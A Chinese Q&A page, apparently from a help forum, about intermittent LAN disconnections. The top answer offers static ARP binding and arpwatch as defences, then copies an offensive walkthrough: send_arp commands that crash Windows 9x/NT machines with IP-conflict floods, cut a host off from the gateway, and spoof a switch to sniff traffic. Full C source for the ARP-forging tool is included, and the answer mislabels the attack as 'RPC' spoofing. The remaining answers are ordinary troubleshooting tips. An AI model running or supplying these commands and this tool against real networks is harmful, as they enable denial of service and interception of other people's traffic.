上网时断时续是不是是什么病毒,我们是局域网,应该怎么杀毒?

如题所述

九成是RPC欺骗!

(一)用IP->MAC绑定(静态ARP),可能可以解决这个问题

对于arp spoofing攻击,

在你的linux服务器上静态绑定ip与mac地址:

#/usr/sbin/arp -s 192.168.0.254 **:**:**:**:**:** (就是你自己的网卡mac,ifconfig就看到了)

这样你自己的服务器在受到arp spoofing攻击的时候就不会修改192.168.0.254的mac地址了,当别的机子查询这个ip的mac的时候,它就会正确回答。然而这时别的机子也受到攻击,所以每台机子的arp缓存里都会有192.168.0.254这个地址的mac地址,所以它们不会发出arp查询,而是直接使用这个伪造的mac地址,所以这些机子仍然不会找到网关上网。

因此,你需要找出局域网中的攻击者。在你的服务器上运行tcpdump,或者dsniff,或者arpwatch(推荐这个)。找出是谁在进行arp spoofing攻击(具体的做法,man一下就知道了)。也可以收集所有机器的mac地址,编号,列表,控制权限。在碰到欺骗攻击的时候,只需要ping一下被攻击的IP,然后arp -a,找到被攻击的IP的mac地址,对应一下你的mac列表,然后...

也可以在每台机器上默认打开ip转发,这样即使欺骗了,也是可以上网的,但是明文传送密码的譬如telnet容易被sniff.
转载 “Linux实现ip和mac绑定”http://new.fengnet.com/Article/OS/Linux/200312/266.html

在有些系统中有这样的需求,希望内部网中的某几个IP地址连接互联网,而又希望这些IP地址不被非法用户盗用。可以通过下面的解决办法实现:
首先使用ipchains或者iptables来设定只允许合法的IP地址连出。
对于合法IP建立IP/Mac捆绑。要讨论这个问题我们首先需要了解ARP协议的工作原理,arp协议是地址解析协议(Address Resolution Protocol)的缩写,其作用及工作原理如下:
在底层的网络通信中,两个节点想要相互通信,必须先要知道源与目标的MAC地址。为了让系统能快速地找到一个远程节点的MAC地址,每一个本地的内核都保存有一个即时的查询表(称为ARP缓存)。ARP中有影射远程主机的IP地址到其对应的MAC地址的一个列表。地址解析协议(ARP)缓存是一个常驻内存的数据结构,其中的内容是由本地系统的内核来管理和维护的。默认的情况下,ARP缓存中保留有最近十分钟本地系统与之通信的节点的IP地址(和对应的MAC地址)。
当一个远程主机的MAC地址存在于本地主机的ARP 缓存中,转换远程节点的IP地址为MAC地址不会遇到问题。然而在许多情况下,远程主机的MAC地址并不存在于本地的ARP缓存中,系统会怎么处理呢?在知道一个远程主机的IP地址,但是MAC地址不在本地的ARP缓存中的时候,以下的过程用来获取远程节点的MAC地址:本地主机发送一个广播包给网络中的所有的节点,询问是否有对应的IP地址。一个节点(只有一个)会回答这个ARP广播信息。在回应的信息包里就会包含有这个远程主机的MAC地址。在收到这个返回包后,本地节点就会在本地ARP缓存中记录远程节点的MAC地址。
如果我们将IP/MAC对应关系建立为固定的,也就是对那些合法IP地址建立静态的MAC对应关系,那么即使非法用户盗用了IP地址linux路由器在回应这些IP发出的连接请求时则不会通过arp协议询问其mac地址而是使用Linux建立的静态MAC地址、发出应答数据这样盗用IP者则不会得到应答数据从而不能使用网络服务。
建立静态IP/MAC捆绑的方法是:建立/etc/ether文件,其中包含正确的IP/MAC对应关系,格式如下:
192.168.2.32 08:00:4E:B0:24:47
然后再/etc/rc.d/rc.local最后添加:
arp -f
即可

2.4内核的iptables可以对IP和Mac同时进行限定,使用该功能对合法IP的规则同时限定IP地址和Mac地址即可。

(二)
一个要攻击的机子:10.5.4.178
硬件地址:52:54:4C:98:EE:2F
我的机子: :10.5.3.69
硬件地址:52:54:4C:98:ED:C5
网关: 10.5.0.3
硬件地址:00:90:26:3D:0C:F3
一台交换机另一端口的机子:10.5.3.3
硬件地址:52:54:4C:98:ED:F7

一:用ARP破WINDOWS的屏保
原理:利用IP冲突的级别比屏保高,当有冲突时,就会
跳出屏保。
关键:ARP包的数量适当。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \
10.5.4.178 52:54:4C:98:EE:2F 40

二:用ARP导致IP冲突,死机
原理:WINDOWS 9X,NT4在处理IP冲突时,处理不过来,导致死机。
注: 对WINDOWS 2K,LINUX相当于flooding,只是比一般的FLOODING
有效的多.对LINUX,明显系统被拖慢。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \
10.5.4.178 52:54:4C:98:EE:2F 999999999

三:用ARP欺骗网关,可导致局域网的某台机子出不了网关。
原理:用ARP应答包去刷新对应着要使之出不去的机子。
[root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 \
10.5.4.178 00:90:26:3D:0C:F3 1
注意:如果单单如上的命令,大概只能有效几秒钟,网关机子里的ARP
高速缓存会被被攻击的机子正确刷新,于是只要...

四:用ARP欺骗交换机,可监听到交换机另一端的机子。
可能需要修改一下send_arp.c,构造如下的数据包。
ethhdr
srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H
arphdr
hwtype:1 protol:800H hw_size:6 pro_size:4 op:1
s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3
d_ha:00:00:00:00:00:00 d_ip:10.5.3.3
然后就可以sniffer了。
原理:
交换机是具有记忆MAC地址功能的,它维护一张MAC地址和它的口号表
所以你可以先来个ARP 欺骗,然后就可以监听了
不过需要指出,欺骗以后,同一个MAC地址就有两个端口号
yuange说,“这样其实就是一个竞争问题。”
好象ARP 以后,对整个网络会有点影响,不过我不敢确定
既然是竞争,所以监听也只能监听一部分,不象同一HUB下的监听。
对被监听者会有影响,因为他掉了一部分数据。

当然还有其他一些应用,需要其他技术的配合。
以下是send_arp.c的源程序

CODE:
/*
This program sends out one ARP packet with source/target IP
and Ethernet hardware addresses suuplied by the user. It
compiles and works on Linux and will probably work on any
Unix that has SOCK_PACKET. [email]volobuev@t1.chem.umn.edu[/email]
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2
#define OP_ARP_QUEST 1
#define DEFAULT_DEVICE "eth0"
char usage[] = {"send_arp: sends out custom ARP packet. yuri volobuev
usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"};
struct arp_packet
{
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};
void die (char *);
void get_ip_addr (struct in_addr *, char *);
void get_hw_addr (char *, char *);
int main (int argc, char * argv[])
{
struct in_addr src_in_addr, targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;
int j,number;
if (argc != 6)
die(usage);
sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP));
if (sock < 0)
{
perror("socket");
exit(1);
}
number=atoi(argv[5]);
pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op = htons(OP_ARP_QUEST);
get_hw_addr(pkt.targ_hw_addr, argv[4]);
get_hw_addr(pkt.rcpt_hw_addr, argv[4]);
get_hw_addr(pkt.src_hw_addr, argv[2]);
get_hw_addr(pkt.sndr_hw_addr, argv[2]);
get_ip_addr(&src_in_addr, argv[1]);
get_ip_addr(&targ_in_addr, argv[3]);
memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN);
bzero(pkt.padding,18);
strcpy(sa.sa_data,DEFAULT_DEVICE);
for (j=0;j {
if (sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}
}
exit(0);
}
void die (char *str)
{
fprintf(stderr,"%s\n",str);
exit(1);
}
void get_ip_addr (struct in_addr *in_addr, char *str)
{
struct hostent *hostp;
in_addr->s_addr = inet_addr(str);
if(in_addr->s_addr == -1)
{
if ((hostp = gethostbyname(str)))
bcopy(hostp->h_addr, in_addr, hostp->h_length);
else {
fprintf(stderr, "send_arp: unknown host %s\n", str);
exit(1);
}
}
}
void get_hw_addr (char *buf, char *str)
{
int i;
char c, val;
for(i = 0; i < ETH_HW_ADDR_LEN; i++)
{
if (!(c = tolower(*str++)))
die("Invalid hardware address");
if (isdigit(c))
val = c - '0';
else if (c >= 'a' && c <= 'f')
val = c-'a'+10;
else
die("Invalid hardware address");
*buf = val << 4;
if (!(c = tolower(*str++)))
die("Invalid hardware address");
if (isdigit(c))
val = c - '0';
else if (c >= 'a' && c <= 'f')
val = c-'a'+10;
else
die("Invalid hardware address");
*buf++ |= val;
if (*str == ':')
str++;
}
}
温馨提示:内容为网友见解,仅供参考
第1个回答  2006-09-11
不是,你看看路由器和猫之间有没有接触不良问题.
局域网杀毒要每台机子都杀,建议每台电脑都装杀毒软件!要不很难杀完
第2个回答  2006-09-11
这么复杂呀.我的头都晕了,我个人认为一是有可能是你的连结不好,包括水晶头,网卡,网线.交换机,你可能挨个试一下,先换个端口,再换根网线,再把网卡重新插拔一下,不行换个网卡试,也就这么多可能吧,再不行我就不知道了。
第3个回答  2006-09-11
上网断线不应该是病毒,可能是你们网络商或者你电脑系统的原因
第4个回答  2006-09-11
局域网杀毒要一台隔离起来做
要不然又要跑到另一台机子上了
一个一个杀干净了以后再边上网
别在网上杀本回答被提问者和网友采纳

上网时断时续是不是是什么病毒,我们是局域网,应该怎么杀毒?
上网断线不应该是病毒,可能是你们网络商或者你电脑系统的原因

网络很不稳定,时好时坏,时快时慢,怎么了?
二、电脑中病毒导致,这种情况需要使用杀毒软件全盘杀毒了,首先排除病毒原因导致的网络不正常,大部分的木马还会劫持DNS导致网速变慢或者根本无法上网。三、路由器本身有故障,这种情况可以去掉路由器,直接拨号上网看看是否掉出现不稳定的情况。四、运营商网络问题,如果直接连接电脑还是会出现不稳定情况,那么...

办公室局域网内,其他电脑上网正常,我的总是经常掉线怎么回事?
2、如果掉线,说明你主机系统有问题。要么是网卡坏了,要么就是系统中毒了。先拿根好的网卡试下。不行再需要重装系统。。3、如果线路有问题,可能是接口没做好,重新做个接口,还是不行的话,就换根线了。

局域网时断时续,应该怎么解决
1,有可能是局域网内有人使用下载软件造成的,比如(WEB迅雷,电驴==)2,是你们的局域网内有病毒,这样的话现象和你说的差不多,就是突然间网络有可能变卡,有时候过一段时间就会恢复,有时不会恢复,这样是有的机器有病毒,他只要开机连网,就回开始向网络发送数据,随着数据量的曾加就会影响网络...

上网总是断网,是不是中病毒或者木马了?
魔波”病毒,这个病毒是针对ADSL的用户。也有可能你的网卡受损,所以导致不能正常上网。当然也有可能是线路不稳定,因为夏天温度较高,又是上网的高峰期,所以相对而言不是那么稳定。还有一种可能,是你没有教网费,你可以查看下。如果实在无法解决上网问题,可以找专业人士来修理。希望你能早点上网。

局域网内上网总是不稳定,经常掉线
如果是,证明是“网络风暴”导致的网络堵塞。建议开启路由器doss防火墙(如果有的话)。检查被doss防火墙所阻挡的电脑(杀毒)。如果路由器不带doss防火墙检测起来就比较麻烦了!需要一台一台电脑排除。兄弟估计你局域网内的机器还是有一定数量的,应该不是一台中了这种向局域网内发垃圾包的病毒了。

电脑的网络总是断开连接,不停的自动这样,怎么回事啊?
解决办法就是系统还原或者重装。还有就是可能中病毒,导致电脑与网关IP通信异常导致掉线。解决办法就是杀毒,借用各大杀毒软件整机扫描杀毒。如果你的是局域网,除上述可能原因外,还有就是局域网内电脑IP冲突,比如IP重复,导致经常掉线。解决办法,重新设置IP,避免重复。望采纳 ...

自己装的宽带,电脑老断线,系统显示被局域网攻击是怎么回事??
鹤湖科技提示您一般出现这种情况是局域网内有人中了ARP病毒,建议马上找出攻击者的IP地址,对其电脑进行杀毒,注意一般中了ARP病毒的电脑是能正常上网的,到时候问一下谁能正常上网的就可以快速找到病毒源了。

在家里距路由器很近但信号时好时坏是什么原因?
局域网的电脑存在病毒或者木马,可能木马病毒存在偷网、上传宽带的情况。建议:可以尝试通过杀毒软件查杀电脑病毒。4、线路问题 如果使用网线与电脑直连,经过测试有线上网速度依然不正常,和无线网络一样存在不稳定的情况。建议:连接宽带服务商检查线路问题。5、路由器发热 路由器发热会影响网速!无线路由器...

家里网络老不好,经常断网怎么办
【3】如果单独运行程序时掉线(比如果玩游戏时掉线),建议重启电脑尝试或者重新安装该程序;【4】如果是整个网络掉线,请检查接入线与网线是否松动或接触不良,重新拔插线路尝试;【5】检查过滤电脑病毒引起的断线,全盘扫描。2、如经以上方式排障后,还是无法解决问题,您可联系归属地人工客服报障处理。

相似回答